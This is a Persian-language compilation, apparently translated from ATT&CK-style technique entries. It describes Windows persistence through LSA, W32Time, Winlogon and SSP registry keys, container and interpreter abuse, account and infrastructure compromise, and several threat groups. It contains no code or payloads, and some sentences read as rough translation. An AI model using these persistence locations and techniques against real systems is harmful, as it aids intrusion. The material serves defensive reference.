هنگامی که سیستم بوت می شود، دشمنان ممکن است از بسته های احراز هویت برای اجرای DLL سوء استفاده کنند. DLLهای بسته احراز هویت ویندوز توسط فرآیند محلی امنیت (LSA) در شروع سیستم بارگیری می‌شوند. آنها از چندین فرآیند ورود به سیستم و چندین پروتکل امنیتی برای سیستم عامل پشتیبانی می کنند. دشمنان می توانند با قرار دادن ارجاع به یک باینری در مکان رجیستری ویندوز از مکانیسم شروع خودکار ارائه شده توسط بسته های احراز هویت LSA برای تداوم استفاده کنند. HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ با مقدار کلیدی: "Authentication Packages"=<target binary> پس از بارگیری بسته های احراز هویت، کدهای باینری توسط سیستم اجرا می شوند.

هنگامی که سیستم بوت می شود، ممکن است دشمنان از ارائه دهندگان زمان برای اجرای DLL سوء استفاده کنند. سرویس (W32Time) همگام سازی زمان را در دامنه ها و درون دامنه ها فعال می‌کند. ارائه دهندگان زمان W32Time مسئول بازیابی مهرهای زمانی از منابع سخت افزاری/شبکه و خروجی این مقادیر به سایر مشتریان شبکه هستند. ارائه‌دهندگان زمان به‌عنوان کتابخانه‌های پیوند پویا ( DLL) پیاده‌سازی می‌شوند که در کلیدهای فرعی ثبت می‌شوند. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\ مدیر ارائه‌دهنده زمان، که توسط مدیر کنترل سرویس هدایت می‌شود، ارائه‌دهندگان زمان فهرست‌شده و فعال شده تحت این کلید را هنگام راه‌اندازی سیستم و/یا هر زمان که پارامترها تغییر می‌کنند، بارگیری و راه‌اندازی می‌کند.دشمنان ممکن است از این معماری برای ایجاد تداوم سوء استفاده کنند، به ویژه با ثبت و فعال کردن یک DLL مخرب به عنوان ارائه‌دهنده زمان. امتیازات سرپرست برای ثبت نام ارائه‌دهنده زمانی مورد نیاز است، اگرچه اجرا در زمینه حساب Local Service اجرا می‌شود.

هنگامی که کاربر وارد سیستم می‌شود، ممکن است دشمنان از ویژگی‌های Winlogon برای اجرای DLL و/یا فایل‌های اجرایی سوء استفاده کنند. Winlogon.exe یک مؤلفه ویندوز است که مسئول اقدامات در هنگام ورود/خروج و همچنین توالی توجه ایمن ( SAS) است که توسط Ctrl-Alt-Delete فعال می‌شود. ورودی های رجیستری در HKLM\Software[\Wow6432Node\]\Microsoft\WindowsNT\CurrentVersion\Winlogon\ و HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ برای مدیریت برنامه های کمکی اضافی و عملکردهایی که از Winlogon پشتیبانی می کنند استفاده می شود. تغییرات مخرب در این کلیدهای رجیستری ممکن است باعث شود Winlogon DLL ها و/یا فایل های اجرایی مخرب را بارگیری و اجرا کند.

هنگامی که سیستم بوت می شود، دشمنان ممکن است از ارائه دهندگان پشتیبانی امنیتی (SSPs)برای اجرای DLL سوءاستفاده کنند. Windows SSP DLLها در هنگام شروع سیستم در فرآیند (LSA) بارگذاری می‌شوند. پس از بارگیری در LSA,DLLهایSSP به رمزهای عبور رمزگذاری شده و متن ساده که در ویندوز ذخیره می شوند، مانند رمز عبور دامنه یا پین کارت هوشمند هر کاربر وارد شده دسترسی دارند. پیکربندی SSP در دو کلید رجیستری ذخیره می شود: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages و HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages

دشمنان ممکن است یک تصویر کانتینری را مستقیماً روی یک میزبان بسازند تا از دفاعی که برای بازیابی تصاویر مخرب از یک ثبت عمومی نظارت می کند دور بزنند. یک درخواست ساخت از راه دور ممکن است به Docker API ارسال شود که شامل یک Dockerfile است که یک تصویر پایه واقعی مانند alpine را از یک رجیستری عمومی یا محلی می‌کشد و سپس یک تصویر سفارشی بر روی آن ایجاد می‌کند. دشمن ممکن است از آن API ساخت استفاده کند. برای ساختن یک تصویر سفارشی بر روی هاست که شامل بدافزار دانلود شده از سرور C2 است و سپس آنها ممکن است از Deploy Container با استفاده از آن تصویر سفارشی استفاده کنند. اگر تصویر پایه از یک رجیستری عمومی بیرون کشیده شود، دفاع احتمالاً تصویر را مخرب تشخیص نمی دهد زیرا یک تصویر وانیلی است. اگر تصویر پایه قبلاً در یک رجیستری محلی قرار داشته باشد، ممکن است کشش حتی کمتر مشکوک تلقی شود زیرا تصویر از قبل در محیط است.

هنگامی که رمز عبور ناشناخته است یا زمانی که هش رمز عبور به دست می آید، دشمنان ممکن است از تکنیک‌های brute force برای دسترسی به حساب ها استفاده کنند. بدون اطلاع از رمز عبور یک حساب یا مجموعه ای از حساب ها، دشمن ممکن است به طور سیستماتیک رمز عبور را با استفاده از مکانیزم تکراری یا تکراری حدس بزند. گذرواژه‌های اجباری وحشیانه می‌توانند از طریق تعامل با سرویسی انجام شوند که اعتبار آن اعتبارنامه‌ها را بررسی می‌کند یا به‌صورت آفلاین در برابر داده‌های اعتبارنامه‌ای که قبلاً به دست آورده‌اید، مانند درهم‌سازی رمز عبور. مجوزهای اجباری بی رحمانه ممکن است در نقاط مختلفی در طول یک نقض رخ دهد. به عنوان مثال، دشمنان ممکن است با استفاده از دانش جمع‌آوری‌شده از سایر رفتارهای پس از سازش مانند تخلیه اعتبار سیستم‌عامل، کشف حساب، یا کشف خط‌مشی رمز عبور، دسترسی اجباری به حساب‌های معتبر را در محیط قربانی اعمال کنند. دشمنان همچنین ممکن است فعالیت های اجباری وحشیانه را با رفتارهایی مانند خدمات از راه دور خارجی به عنوان بخشی از دسترسی اولیه ترکیب کنند.

دشمنان ممکن است نشانک‌های مرورگر را برشمارند تا درباره میزبان‌های در معرض خطر بیشتر بیاموزند. نشانک‌های مرورگر ممکن است اطلاعات شخصی کاربران (مانند سایت‌های بانکی، علایق، رسانه‌های اجتماعی و غیره) و همچنین جزئیات مربوط به منابع شبکه داخلی مانند سرورها، ابزارها / داشبوردها یا سایر زیرساخت‌های مرتبط را نشان دهند. نشانک‌های مرورگر همچنین ممکن است پس از دسترسی دشمن به اعتبارنامه‌های معتبر، به‌ویژه اعتبارنامه‌های موجود در فایل‌های مرتبط با ورودهای ذخیره‌شده توسط مرورگر، اهداف دیگری را برجسته کنند. مکان‌های ذخیره‌سازی خاص بر اساس پلتفرم و یا برنامه متفاوت است، اما نشانک‌های مرورگر معمولاً در فایل‌ها/پایگاه‌های داده محلی ذخیره می‌شوند.

دشمنان ممکن است از آسیب‌پذیری‌های امنیتی و عملکرد ذاتی نرم‌افزار مرورگر برای تغییر محتوا، اصلاح رفتار کاربر، و رهگیری اطلاعات به عنوان بخشی از تکنیک‌های مختلف ربودن جلسه مرورگر استفاده کنند. یک مثال خاص زمانی است که یک دشمن نرم‌افزاری را به مرورگر تزریق می‌کند که به آنها اجازه می‌دهد کوکی‌ها، جلسات HTTP و گواهی‌های کلاینت SSL یک کاربر را به ارث ببرند و سپس از مرورگر به عنوان راهی برای چرخش به یک اینترانت تأیید شده استفاده کنند. اجرای رفتارهای مبتنی بر مرورگر مانند چرخش ممکن است به مجوزهای فرآیند خاصی مانند SeDebugPrivilege و یا حقوق مدیریت با یکپارچگی بالا نیاز داشته باشد. مثال دیگر شامل چرخش ترافیک مرورگر از مرورگر حریف از طریق مرورگر کاربر با تنظیم یک پروکسی است که ترافیک وب را تغییر مسیر می دهد. این به هیچ وجه ترافیک کاربر را تغییر نمی دهد و به محض بسته شدن مرورگر می توان ارتباط پراکسی را قطع کرد. حریف زمینه امنیتی هر فرآیند مرورگری را که پروکسی به آن تزریق می شود، فرض می کند. مرورگرها معمولاً برای هر برگه ای که باز می شود فرآیند جدیدی ایجاد می کنند و مجوزها و گواهی ها بر اساس آن از هم جدا می شوند. با این مجوزها، حریف به طور بالقوه می تواند به هر منبعی در اینترانت، مانند Sharepoint یا وب میل، که از طریق مرورگر قابل دسترسی است و مرورگر مجوزهای کافی را دارد، مرور کند. چرخش مرورگر همچنین ممکن است امنیت ارائه شده توسط احراز هویت 2 عاملی را دور بزند.

BackdoorDiplomacy یک گروه تهدید جاسوسی سایبری است که حداقل از سال 2017 فعال بوده است. BackdoorDiplomacy وزارتخانه های امور خارجه و شرکت های مخابراتی در آفریقا، اروپا، خاورمیانه و آسیا را هدف قرار داده است.

BlackOasisیک گروه تهدید خاورمیانه است که گمان می‌رود مشتری گروه Gamma باشد. این گروه به شخصیت‌های برجسته سازمان ملل و همچنین وبلاگ‌نویسان مخالف، فعالان، خبرنگاران اخبار منطقه ای و اتاق‌های فکر علاقه نشان داده است.گروهی که توسط مایکروسافت به نامNEODYMIUM شناخته می‌شود، طبق گزارش‌ها، ارتباط نزدیکی با عملیات BlackOasis دارد.

BlackTech یک گروه جاسوسی سایبری است که علیه اهدافی در شرق آسیا، به ویژه تایوان، و گاهی اوقات، ژاپن و هنگ کنگ فعالیت می کند.

Blue Mockingbird مجموعه‌ای از فعالیت‌های مشاهده‌شده است که شامل بارهای استخراج ارز دیجیتال Monero به شکل کتابخانه پیوند پویا ( DLL) در سیستم‌های ویندوز است. اولین ابزار مشاهده شده Blue Mockingbird در دسامبر 2019 ایجاد شد.

Bouncing Golf یک کمپین جاسوسی سایبری است که کشورهای خاورمیانه را هدف قرار می دهد.

BRONZE BUTLER یک گروه جاسوسی سایبری با منشاء احتمالی چینی است که حداقل از سال 2008 فعال بوده است. این گروه عمدتاً سازمان های ژاپنی، به ویژه سازمان های دولتی، بیوتکنولوژی، تولید الکترونیک و شیمی صنعتی را هدف قرار می دهد.

دشمنان ممکن است حساب‌هایی را با سرویس‌هایی که می‌توانند در هنگام هدف‌گیری استفاده شوند، به خطر بیاندازند. برای عملیات شامل مهندسی اجتماعی، استفاده از شخصیت آنلاین ممکن است مهم باشد. به جای ایجاد و پرورش حساب (یعنی ایجاد حساب)، دشمنان ممکن است حساب‌های موجود را به خطر بیاندازند. در صورت داشتن رابطه یا آگاهی از شخص آسیب‌دیده، استفاده از یک شخصیت موجود ممکن است باعث ایجاد اعتماد در قربانی بالقوه شود. روش‌های مختلفی برای به خطر انداختن حساب‌ها وجود دارد، مانند جمع‌آوری اعتبار از طریق Phishing for Information ، خرید اعتبار از سایت‌های شخص ثالث یا مجبور کردن اعتبارنامه‌ها.

دشمنان ممکن است حساب‌های رسانه‌های اجتماعی را که می‌توانند در هنگام هدف‌گیری استفاده شوند، به خطر بیاندازند. برای عملیاتی که شامل مهندسی اجتماعی می‌شود، استفاده از شخصیت آنلاین ممکن است مهم باشد. به جای ایجاد و پرورش پروفایل‌های رسانه‌های اجتماعی (یعنی حساب‌های رسانه‌های اجتماعی)، دشمنان ممکن است حساب‌های رسانه‌های اجتماعی موجود را به خطر بیاندازند. استفاده از یک شخصیت موجود ممکن است سطحی از اعتماد را در یک قربانی بالقوه ایجاد کند، اگر آنها رابطه یا شناختی از شخصیت در معرض خطر داشته باشند. روش‌های مختلفی برای به خطر انداختن حساب‌های رسانه‌های اجتماعی وجود دارد، مانند جمع‌آوری اعتبار از طریق فیشینگ برای اطلاعات، خرید اعتبار از سایت‌های شخص ثالث، یا با اجبار بی‌رحمانه اعتبار (مثلاً: استفاده مجدد از گذرواژه ناشی از موارد نقض اعتبار). قبل از به خطر انداختن حساب‌های رسانه‌های اجتماعی، دشمنان ممکن است شناسایی انجام دهند تا تصمیم‌گیری در مورد اینکه کدام حساب‌ها برای پیشبرد عملکردشان به خطر بیفتند، مطلع شوند. پرسوناها ممکن است در یک سایت واحد یا در چندین سایت (مثلاً فیس بوک، لینکدین، توییتر و غیره) وجود داشته باشند. حساب‌های رسانه‌های اجتماعی در معرض خطر ممکن است نیاز به توسعه بیشتری داشته باشند، این می‌تواند شامل پر کردن یا اصلاح اطلاعات نمایه، توسعه بیشتر شبکه‌های اجتماعی یا ترکیب عکس‌ها باشد. دشمنان می‌توانند از پروفایل رسانه‌های اجتماعی به خطر افتاده برای ایجاد ارتباطات جدید یا ربودن ارتباطات موجود با اهداف مورد نظر استفاده کنند. این ارتباطات ممکن است مستقیم باشند یا ممکن است شامل تلاش برای اتصال از طریق دیگران باشد. نمایه‌های در معرض خطر ممکن است در سایر مراحل چرخه حیات دشمن، مانند هنگام دسترسی اولیه (مثلاً Spearphishing از طریق سرویس) مورد استفاده قرار گیرند.

دشمنان ممکن است حساب‌های ایمیلی را که می‌توان در هنگام هدف‌گیری استفاده کرد، به خطر انداخت. دشمنان می توانند از حساب های ایمیل در معرض خطر برای پیشبرد عملیات خود استفاده کنند، مانند استفاده از آنها برای انجام فیشینگ برای اطلاعات یا فیشینگ. استفاده از یک پرسونای موجود با یک حساب ایمیل در معرض خطر ممکن است سطحی از اعتماد را در یک قربانی احتمالی ایجاد کند، در صورتی که آنها رابطه یا شناختی از شخصیت در معرض خطر داشته باشند. از حساب‌های ایمیل در معرض خطر نیز می‌توان در دستیابی به زیرساخت‌ها (مثلاً دامنه‌ها) استفاده کرد. روش‌های مختلفی برای به خطر انداختن حساب‌های ایمیل وجود دارد، مانند جمع‌آوری اعتبار از طریق فیشینگ برای اطلاعات، خرید اعتبار از سایت‌های شخص ثالث، یا با اجبار بی‌رحمانه اعتبارنامه‌ها (مثلاً استفاده مجدد از گذرواژه از موارد ناقض اعتبار). قبل از به خطر انداختن حساب‌های ایمیل، دشمنان ممکن است شناسایی انجام دهند تا تصمیم‌گیری در مورد اینکه کدام حساب‌ها به خطر بیفتند تا عملکرد خود را بیشتر کنند. دشمنان م‌توانند از یک حساب ایمیل در معرض خطر برای ربودن رشته‌های ایمیل موجود با اهداف مورد نظر استفاده کنند.

دشمنان ممکن است زیرساخت‌های شخص ثالثی را که می‌تواند در هنگام هدف‌گیری استفاده شود، به خطر بیاندازند. راه‌حل‌های زیرساخت شامل سرورهای فیزیکی یا ابری، دامنه‌ها و خدمات وب شخص ثالث است. به جای خرید یا اجاره زیرساخت، دشمن ممکن است زیرساخت‌ها را به خطر بیندازد و از آن در مراحل دیگر چرخه حیات دشمن استفاده کند. علاوه بر این، دشمنان ممکن است ماشین‌های متعددی را برای ایجاد بات نت مورد استفاده قرار دهند. استفاده از زیرساخت‌های آسیب‌دیده به دشمن این امکان را می‌دهد که یک عملیات را مرحله‌بندی، راه‌اندازی و اجرا کند. زیرساخت‌های آسیب‌دیده می‌توانند به عملیات متخاصم کمک کنند تا با ترافیکی که معمولی تلقی می‌شود، مانند تماس با شهرت بالا یا سایت‌های معتبر، ترکیب شوند.

دشمنان ممکن است دامنه‌ها و/یا زیردامنه‌هایی را که می‌توان در طول هدف‌گیری استفاده کرد بربایند. ربودن ثبت دامنه عمل تغییر ثبت نام دامنه بدون اجازه ثبت کننده اصلی است. یک دشمن ممکن است به حساب ایمیل شخصی که به عنوان مالک دامنه فهرست شده است دسترسی پیدا کند. سپس حریف می‌تواند ادعا کند که رمز عبور خود را فراموش کرده است تا تغییراتی در ثبت دامنه ایجاد کند. سایر امکانات شامل مهندسی اجتماعی یک میز کمک ثبت دامنه برای دسترسی به یک حساب کاربری یا استفاده از شکاف‌های فرآیند تجدید است. ربودن زیر دامنه زمانی رخ می‌دهد که سازمان‌ها ورودی‌های DNS داشته باشند که به منابع موجود یا از بین‌رفته اشاره می‎کند. در چنین مواردی، یک حریف ممکن است کنترل یک زیر دامنه را برای انجام عملیات با بهره مندی از اعتماد مرتبط با آن دامنه به دست بگیرد.

دشمنان ممکن است سرورهای DNS شخص ثالثی را که می‌توانند در هنگام هدف‌گیری مورد استفاده قرار گیرند، به خطر بیاندازند. در طول فعالیت پس از سازش، دشمنان ممکن است از ترافیک DNS برای وظایف مختلف، از جمله برای فرمان و کنترل (مثلاً پروتکل لایه برنامه) استفاده کنند. به جای راه‌اندازی سرورهای DNS خود، دشمنان ممکن است برای پشتیبانی از عملیات، سرورهای DNS شخص ثالث را به خطر بیاندازند. با به خطر انداختن سرورهای DNS، دشمنان می‌توانند رکوردهای DNS را تغییر دهند. چنین کنترلی می‌تواند امکان هدایت مجدد ترافیک سازمان را فراهم کند و تلاش‌های جمع‌آوری و دسترسی به اعتبار را برای دشمن تسهیل کند. همچنین ممکن است دشمنان بتوانند به‌طور بی‌صدا زیر دامنه‌هایی را که به سمت سرورهای مخرب هدایت می‌شوند، بدون اشاره به مالک واقعی سرور DNS ایجاد کنند.

دشمنان ممکن است سرورهای خصوصی مجازی شخص ثالث(VPS) را که می‌توانند در هنگام هدف قرار دادن استفاده شوند، به خطر بیاندازند. ارائه دهندگان خدمات ابری مختلفی وجود دارند که ماشین‌های مجازی/کانتینرها را به عنوان یک سرویس می‌فروشند. دشمنان ممکن است VPSهای خریداری شده توسط نهادهای شخص ثالث را به خطر بیاندازند. با به خطر انداختن یک VPSبرای استفاده به عنوان زیرساخت، دشمنان می‌توانند اتصال فیزیکی عملیات به خود را دشوار کنند. به خطر انداختن یک VPS برای استفاده در مراحل بعدی چرخه حیات دشمن، مانند فرماندهی و کنترل، می‌تواند به دشمنان اجازه دهد از همه جا و اعتماد مرتبط با ارائه دهندگان خدمات ابری با شهرت بالاتر و همچنین موارد اضافه شده توسط شخص ثالث در معرض خطر بهره‌مند شوند.

دشمنان ممکن است سرورهای شخص ثالثی را که می‌توانند در هنگام هدف‌گیری استفاده شوند، به خطر بیاندازند. استفاده از سرورها به حریف اجازه می‌دهد تا عملیات را مرحله‌‎بندی، راه اندازی و اجرا کند. در طول فعالیت پس از سازش، دشمنان ممکن است از سرورها برای کارهای مختلف از جمله برای فرماندهی و کنترل استفاده کنند. به جای خرید یک سرور یا سرور خصوصی مجازی، دشمنان ممکن است سرورهای شخص ثالث را برای پشتیبانی از عملیات به خطر بیاندازند. دشمنان همچنین ممکن است مانند، Drive-by Compromiseسرورهای وب را برای پشتیبانی از عملیات حفره آب به خطر بیاندازند.

دشمنان ممکن است سیستم‌های شخص ثالث متعددی را به خطر بیاندازند تا یک بات‌نت تشکیل دهند که می‌تواند در هنگام هدف‌گیری استفاده شود. بات‌نت شبکه‌ای از سیستم‌های در معرض خطر است که می‌توان برای انجام وظایف هماهنگ دستور داد. دشمنان ممکن است بات نت خود را با به خطر انداختن سیستم‌های شخص ثالث متعدد بسازند. دشمنان همچنین ممکن است یک بات‌نت موجود را تصاحب کنند، مانند هدایت مجدد ربات‌ها به سرورهای C2 تحت کنترل دشمن. با داشتن یک بات نت در اختیار دشمنان، ممکن است فعالیت‌های بعدی مانند فیشینگ در مقیاس بزرگ یا انکار سرویس توزیع شده (DDoS) انجام دهند.

دشمنان ممکن است دسترسی به سرویس‌های وب شخص ثالث را که می‌توانند در طول هدف قرار دادن استفاده شوند، به خطر بیاندازند. انواع وب‌سایت‌های محبوب برای کاربران قانونی برای ثبت نام در سرویس‌های مبتنی بر وب وجود دارد، مانند GitHub، Twitter، Dropbox، Google، و غیره. دشمنان ممکن است سعی کنند مالکیت دسترسی یک کاربر قانونی به یک سرویس وب را در اختیار بگیرند و از آن وب سرویس به عنوان استفاده کنند. زیرساخت پشتیبانی از عملیات سایبری چنین سرویس‌های وب می‌توانند در مراحل بعدی چرخه حیات دشمن مورد سوء استفاده قرار گیرند، مانند هنگام فرماندهی و کنترل (وب سرویس) یاExfiltration Over Web Service استفاده از سرویس‌های رایج، مانند سرویس‌هایی که توسط گوگل یا توییتر ارائه می‌شود، مخفی شدن در نویز مورد انتظار را برای دشمنان آسان‌تر می‌کند. با استفاده از یک سرویس وب، به ویژه زمانی که دسترسی از کاربران قانونی دزدیده می‌شود، دشمنان می‌توانند پیوند فیزیکی عملیات را با آنها دشوار کنند.

دشمنان ممکن است از مفسر دستورات و اسکریپت برای اجرای دستورات، اسکریپت‌ها یا باینری‌ها سوءاستفاده کنند. این رابط‌ها و زبان‌ها راه‌هایی برای تعامل با سیستم‌های کامپیوتری ارائه می‌کنند و یک ویژگی مشترک در بسیاری از پلتفرم‌های مختلف هستند. اکثر سیستم‌ها دارای رابط خط فرمان داخلی و قابلیت‌های اسکریپت هستند، به عنوان مثال، توزیع‌های macOS و Linux دارای طعمی از Unix Shell هستند در حالی که نصب‌های ویندوز شامل Windows Command Shell و PowerShell هستند. همچنین مفسرهای بین پلتفرمی مانند پایتون و همچنین مفسرهایی که معمولاً با برنامه های مشتری مانند جاوا اسکریپت و ویژوال بیسیک مرتبط هستند وجود دارد. دشمنان ممکن است از این فناوری ها به طرق مختلف به عنوان ابزاری برای اجرای دستورات دلخواه سوء استفاده کنند. دستورات و اسکریپت‌ها را می‌توان در محموله‌های Initial Access قرار داد که به‌عنوان اسناد فریبنده یا به‌عنوان بارهای ثانویه دانلود شده از یک C2 موجود به قربانیان تحویل داده می‌شوند. دشمنان همچنین ممکن است دستورات را از طریق پایانه‌ها یا پوسته‌های تعاملی اجرا کنند و همچنین از سرویس‌های مختلف از راه دور برای دستیابی به اجرای از راه دور استفاده کنند.

ممکن است دشمنان از دستورات و اسکریپت های PowerShell برای اجرا سوء استفاده کنند. PowerShell یک رابط خط فرمان و محیط اسکریپت تعاملی قدرتمند است که در سیستم عامل ویندوز گنجانده شده است. دشمنان می توانند از PowerShell برای انجام تعدادی از اقدامات از جمله کشف اطلاعات و اجرای کد استفاده کنند. مثلاً cmdlet Start-Process که می تواند برای اجرای یک فایل اجرایی استفاده شود و cmdlet Invoke-Command که یک فرمان را به صورت محلی یا روی یک کامپیوتر راه دور اجرا می کند (اگرچه مجوزهای سرپرست برای استفاده از PowerShell برای اتصال به سیستم های راه دور مورد نیاز است).

ممکن است دشمنان از AppleScript برای اجرا سوءاستفاده کنند. AppleScript یک زبان برنامه نویسی macOS است که برای کنترل برنامه‌ها و بخش‌هایی از سیستم عامل از طریق پیام‌های بین برنامه‌ای به نام AppleEvents طراحی شده است. این پیام‌های AppleEvent را می‌توان به طور مستقل ارسال کرد یا به راحتی با AppleScript اسکریپت کرد. این رویدادها می‌توانند پنجره‌های باز را تعیین مکان کنند، کلیدها را ارسال کنند و تقریباً با هر برنامه‌ای باز شده به صورت محلی یا از راه دور تعامل داشته باشند.

ممکن است دشمنان از پوسته فرمان ویندوز برای اجرا سوء استفاده کنند. پوسته فرمان ویندوز (cmd) خط فرمان اولیه در سیستم های ویندوز است. خط فرمان ویندوز را می توان برای کنترل تقریباً هر جنبه ای از یک سیستم، با سطوح مختلف مجوز مورد نیاز برای زیر مجموعه های مختلف دستورات استفاده کرد. خط فرمان را می توان از راه دور از طریق سرویس های راه دور مانند SSH فراخوانی کرد. فایل‌های دسته‌ای (به عنوان مثال: bat یا cmd) همچنین فهرستی از دستورات متوالی برای اجرا و همچنین عملیات برنامه‌نویسی معمولی مانند شرطی‌ها و حلقه‌ها را در اختیار پوسته قرار می‌دهند. کاربردهای رایج فایل‌های دسته‌ای شامل کارهای طولانی یا تکراری یا نیاز به اجرای مجموعه‌ای از دستورات روی چندین سیستم است. دشمنان ممکن است از cmd برای اجرای دستورات مختلف استفاده کنند. کاربردهای متداول عبارتند از cmd برای اجرای یک فرمان، یا سوء استفاده از cmd به صورت تعاملی با ورودی و خروجی ارسال شده از طریق یک کانال فرمان و کنترل.

دشمنان ممکن است از دستورات و اسکریپت‌های پوسته یونیکس برای اجرا سوءاستفاده کنند. پوسته‌های یونیکس خط فرمان اولیه در سیستم‌های لینوکس و macOS هستند، اگرچه انواع مختلفی از پوسته یونیکس (مانند sh، bash، zsh، و غیره) بسته به سیستم‌عامل یا توزیع خاص وجود دارد. پوسته های یونیکس می توانند تمام جنبه‌های یک سیستم را کنترل کنند، با دستورات خاصی که به امتیازات بالا نیاز دارند. پوسته‌های یونیکس همچنین از اسکریپت‌هایی پشتیبانی می کنند که اجرای متوالی دستورات و همچنین سایر عملیات برنامه نویسی معمولی مانند شرطی‌ها و حلقه‌ها را امکان‌پذیر می‌کنند. استفاده‌های رایج از اسکریپت‌های پوسته شامل کارهای طولانی یا تکراری یا نیاز به اجرای مجموعه‌ای از دستورات روی چندین سیستم است. دشمنان ممکن است از پوسته های یونیکس برای اجرای دستورات یا بارهای مختلف سوء استفاده کنند. پوسته های تعاملی ممکن است از طریق کانال های فرمان و کنترل یا در حین حرکت جانبی مانند SSH قابل دسترسی باشند. دشمنان همچنین ممکن است از اسکریپت های پوسته برای ارائه و اجرای دستورات متعدد بر روی قربانیان یا به عنوان بخشی از بارهای استفاده شده برای پایداری استفاده کنند.

دشمنان ممکن است از ویژوال بیسیک ( VB) برای اجرا سوءاستفاده کنند. VB یک زبان برنامه نویسی است که توسط مایکروسافت با قابلیت همکاری با بسیاری از فناوری‌های ویندوز مانند Component Object Model و Native API از طریق Windows API ایجاد شده است. اگرچه VB به‌عنوان میراث و بدون هیچ گونه تکامل برنامه‌ریزی‌شده در آینده برچسب‌گذاری شده است، اما VB در NET Framework و کراس پلتفرم.NET Core یکپارچه و پشتیبانی می‌شود. زبان های مشتق بر اساس VB نیز ایجاد شده‌اند، مانند Visual Basic for Applications (VBA) و VBScript. VBA یک زبان برنامه نویسی رویداد محور است که در Microsoft Office و همچنین چندین برنامه شخص ثالث تعبیه شده است. VBA اسناد را قادر می سازد تا حاوی ماکروهایی باشند که برای خودکارسازی اجرای وظایف و سایر عملکردها در هاست استفاده می شوند. VBScript یک زبان برنامه نویسی پیش فرض در میزبان ویندوز است و همچنین می تواند به جای جاوا اسکریپت در صفحات وب برنامه HTML (HTA) که به اینترنت اکسپلورر ارائه می شود استفاده شود (اگرچه اکثر مرورگرهای مدرن با پشتیبانی VBScript ارائه نمی شوند). دشمنان ممکن است از payloadهای VB برای اجرای دستورات مخرب استفاده کنند. استفاده مخرب متداول شامل اجرای خودکار رفتارها با VBScript یا جاسازی محتوای VBA در محموله‌های Spearphishing Attachment است.

ممکن است دشمنان از دستورات و اسکریپت‌های پایتون برای اجرا سوءاستفاده کنند. پایتون یک زبان برنامه نویسی/ اسکریپت نویسی بسیار محبوب است که قابلیت اجرای بسیاری از توابع را دارد. پایتون را می‌توان به صورت تعاملی از خط فرمان (از طریق مفسر ( python.exe) یا از طریق اسکریپت‌هایی (py) که می‌توان نوشت و در سیستم‌های مختلف توزیع کرد، اجرا کرد. کد پایتون را می توان در فایل های اجرایی باینری نیز کامپایل کرد. پایتون با بسیاری از بسته‌های داخلی برای تعامل با سیستم زیربنایی، مانند عملیات فایل و ورودی/خروجی دستگاه عرضه می‌شود. دشمنان می توانند از این کتابخانه ها برای دانلود و اجرای دستورات یا اسکریپت های دیگر و همچنین انجام رفتارهای مخرب مختلف استفاده کنند.

ممکن است دشمنان از پیاده سازی های مختلف جاوا اسکریپت برای اجرا سوء استفاده کنند. جاوا اسکریپت (JS) یک زبان برنامه نویسی مستقل از پلتفرم (کامپایل شده به موقع در زمان اجرا) است که معمولاً با اسکریپت ها در صفحات وب مرتبط است، اگرچه JS می‌تواند در محیط‌های زمان اجرا خارج از مرورگر اجرا شود. عنوان بخشی از سازش Drive-by یا دانلود و اجرای این فایل‌های اسکریپت به عنوان بارهای ثانویه است. از آنجایی که این بارها مبتنی بر متن هستند، برای دشمنان نیز بسیار رایج است که محتوای خود را به عنوان بخشی از فایل‌های مبهم یا اطلاعات مبهم کنند.

دشمنان ممکن است از اسکریپت یا مفسرهای داخلی خط فرمان (CLI) در دستگاه‌های شبکه برای اجرای دستورات مخرب و بارهای پرداختی سوء استفاده کنند. CLI ابزار اولیه ای است که از طریق آن کاربران و مدیران با دستگاه به منظور مشاهده اطلاعات سیستم، اصلاح عملیات دستگاه یا انجام عملکردهای تشخیصی و اداری تعامل دارند. CLIها معمولاً شامل سطوح مختلف مجوز مورد نیاز برای دستورات مختلف هستند. مفسرهای اسکریپت وظایف را خودکار می کنند و عملکرد را فراتر از مجموعه دستورات موجود در سیستم عامل شبکه گسترش می دهند. CLI و مفسر اسکریپت از طریق اتصال مستقیم کنسول یا از طریق راه‌های راه دور مانند telnet یا SSH قابل دسترسی هستند. دشمنان می توانند از CLI شبکه برای تغییر نحوه رفتار و عملکرد دستگاه‌های شبکه استفاده کنند. CLI ممکن است برای دستکاری جریان های ترافیکی برای رهگیری یا دستکاری داده‌ها، تغییر پارامترهای پیکربندی راه اندازی برای بارگیری نرم افزارهای مخرب سیستم، یا غیرفعال کردن ویژگی‌های امنیتی یا ثبت گزارش برای جلوگیری از شناسایی استفاده شود.

ممکن است دشمنان از یک سرویس مدیریت کانتینر برای اجرای دستورات درون یک کانتینر سوء استفاده کنند. یک سرویس مدیریت کانتینر مانند Daemon Docker، سرور Kubernetes API یا kubelet ممکن است امکان مدیریت از راه دور کانتینرها را در یک محیط فراهم کند. درDocker، دشمنان ممکن است یک نقطه ورودی را در طول استقرار کانتینر مشخص کنند که یک اسکریپت یا دستور را اجرا می‌کند، یا ممکن است از دستوری مانند docker exec برای اجرای یک فرمان در یک کانتینر در حال اجرا استفاده کنند. در Kubernetes، اگر حریف مجوزهای کافی داشته باشد، ممکن است از طریق تعامل با سرور Kubernetes API، kubelet یا با اجرای دستوری مانند kubectl exec، از راه دور در یک کانتینر در خوشه اجرا شود.

شکار روبنده مشکلات در مورد تهدیدات امنیت سایبری و کشف آسیب‌پذیری‌ها.

مراقبت سایبری مکانیزمی برای نظارت بر افراد، اشیاء یا فرآیندها است که مبتنی بر فناوری‌های جدید هستند و از شبکه‌های داده مانند اینترنت و... اداره می‌شوند. هدف آن تسهیل نظارت، مطابق با کمیت، سرعت یا پیچیدگی داده هایی است که قرار است پردازش شوند.

